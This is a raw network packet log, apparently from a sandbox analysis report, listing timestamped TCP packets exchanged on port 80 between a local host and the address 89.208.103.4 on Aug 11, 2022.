Aug 11, 2022 06:57:07.409722090 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.409743071 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.409759998 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.409785032 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.409799099 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.409826040 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.409837961 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.409857988 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.409877062 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.409903049 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.409918070 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.409943104 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.409955978 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.409976959 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.409996986 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.410012960 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.410036087 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.410051107 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.410074949 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.410092115 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.410114050 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.410130024 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.410154104 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.410173893 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.410196066 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.410212994 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.410238028 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.410254002 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.410278082 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.410295963 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.410317898 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.410341024 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.410356998 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.410376072 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.410396099 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.410424948 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.410437107 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.410449982 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.410474062 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.410501957 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.410514116 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.410530090 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.410553932 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.410571098 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.410593033 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.410620928 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.410648108 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.418601036 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.418687105 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.419080019 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.419106960 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.419135094 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.419142962 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.419157028 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.419162035 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.419178009 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.419189930 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.419214964 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.419215918 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.419234037 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.419245005 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.419272900 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.419275999 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.419298887 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.419303894 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.419322968 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.419326067 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.419354916 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.419368982 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.419372082 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.419399023 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.419420958 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.419439077 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.421719074 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.421746969 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.421773911 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.421783924 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.421798944 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.421798944 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.421816111 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.421827078 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.421854019 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.421854973 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.421878099 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.421879053 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.421901941 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.421906948 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.421920061 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.421933889 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.421960115 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.421966076 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.421988010 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.421989918 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.422013044 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.422017097 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.422035933 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.422039032 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.422065973 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.422071934 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.422091007 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.422091961 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.422110081 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.422117949 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.422142982 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.422144890 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.422168970 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.422173023 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.422185898 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.422224045 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.422233105 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.422259092 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.422283888 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.422287941 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.422301054 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.422312021 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.422337055 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.422338963 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.422364950 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.422369003 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.422389030 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.422394037 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.422413111 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.422420979 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.422442913 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.422450066 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.422473907 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.422477961 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.422492981 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.422502995 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.422528982 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.422529936 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.422540903 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.422554970 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.422580957 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.422586918 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.422607899 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.422610044 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.422626972 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.422633886 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.422657967 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.422661066 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.422683001 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.422688007 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.422704935 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.422713995 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.422739983 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.422740936 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.422750950 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.422765970 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.422791958 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.422794104 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.422806978 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.422818899 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.422847033 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.422863960 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.422874928 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.422899961 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.422924042 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.422933102 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.422943115 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.422983885 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.423017025 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.423053980 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.423079967 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.423088074 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.423095942 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.423122883 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.423150063 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.423156977 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.423170090 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.423190117 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.423218966 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.423223972 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.423232079 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.423257113 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.423281908 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.423290014 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.423305035 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.423324108 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.423343897 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.423374891 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.423384905 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.423413038 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.423430920 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.423445940 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.423463106 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.423507929 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.423538923 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.423572063 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.423603058 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.423604012 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.423612118 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.423636913 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.423667908 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.423671007 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.423690081 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.423706055 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.423723936 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.423739910 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.423773050 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.423773050 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.423794985 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.423805952 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.423836946 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.423836946 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.423868895 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.423892975 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.423901081 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.423945904 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.423954964 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.423980951 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.424012899 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.424012899 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.424031019 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.424046040 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.424069881 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.424078941 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.424093962 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.424113035 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.424138069 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.424144983 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.424155951 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.424179077 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.424205065 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.424213886 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.424247980 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.424252033 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.424263000 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.424280882 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.424304962 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.424326897 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.430677891 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.430710077 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.430742025 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.430799961 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.430855036 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.430862904 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.435379982 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.435456991 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.436414003 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.436448097 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.436474085 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.436481953 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.436499119 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.436516047 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.436541080 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.436568022 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.437434912 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.437468052 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.437494993 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.437501907 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.437516928 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.437535048 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.437561989 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.437570095 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.437583923 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.437604904 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.437632084 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.437638044 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.437653065 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.437673092 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.437691927 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.437721968 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.438595057 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.438627958 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.438652992 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.438659906 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.438664913 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.438693047 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.438719988 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.438728094 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.438752890 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.438775063 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.441138029 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.441171885 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.441201925 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.441204071 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.441224098 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.441237926 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.441261053 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.441270113 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.441303968 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.441306114 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.441318035 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.441339016 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.441364050 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.441370964 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.441396952 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.441406965 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.441431999 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.441441059 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.441457987 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.441473961 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.441499949 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.441507101 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.441523075 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.441540003 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.441567898 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.441572905 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.441601992 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.441607952 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.441623926 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.441641092 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.441663980 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.441673994 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.441685915 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.441708088 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.441731930 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.441740036 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.441767931 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.441785097 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.441817999 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.441819906 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.441833019 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.441849947 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.441886902 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.441909075 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.442123890 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.442157984 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.442188978 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.442202091 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.442219019 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.442236900 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.442267895 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.442280054 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.442290068 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.442296982 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.442329884 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.442331076 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.442368031 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.442370892 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.442393064 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.442435980 CEST	49736	80	192.168.2.3	89.208.103.4
